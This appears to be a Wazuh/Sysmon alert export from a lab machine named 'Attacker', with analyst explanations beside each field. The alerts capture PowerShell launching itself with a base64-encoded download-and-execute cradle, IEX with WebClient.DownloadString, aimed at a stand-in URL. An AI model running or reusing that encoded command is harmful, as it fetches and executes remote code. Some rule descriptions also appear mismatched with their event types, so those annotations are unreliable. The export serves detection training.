agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534323.1689878 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:40.8912001Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284776 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:39.577
ProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00}
ProcessId: 6508
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00}
ParentProcessId: 14508
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:39.577 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd6f-680a-840b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 79 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534323.1697945 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:41.1587369Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284778 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:41.132
ProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00}
ProcessId: 6508
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ue5td5oc.hr3.ps1
CreationUtcTime: 2025-04-24 22:38:41.132
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:41.132 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd6f-680a-840b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ue5td5oc.hr3.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:41.132 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 76 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534327.1700710 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:45.1715994Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284820 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:42.397
ProcessGuid: {94294ddc-bd72-680a-860b-000000000e00}
ProcessId: 15968
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00}
ParentProcessId: 6508
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:42.397 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd72-680a-860b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 6508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 80 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534327.1708777 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:45.3727583Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284823 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:45.358
ProcessGuid: {94294ddc-bd72-680a-860b-000000000e00}
ProcessId: 15968
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_55t22iid.tbx.ps1
CreationUtcTime: 2025-04-24 22:38:45.358
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:45.358 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd72-680a-860b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_55t22iid.tbx.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:45.358 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 77 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534330.1711546 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:48.2560190Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284882 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:46.626
ProcessGuid: {94294ddc-bd76-680a-890b-000000000e00}
ProcessId: 16036
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd72-680a-860b-000000000e00}
ParentProcessId: 15968
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:46.626 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
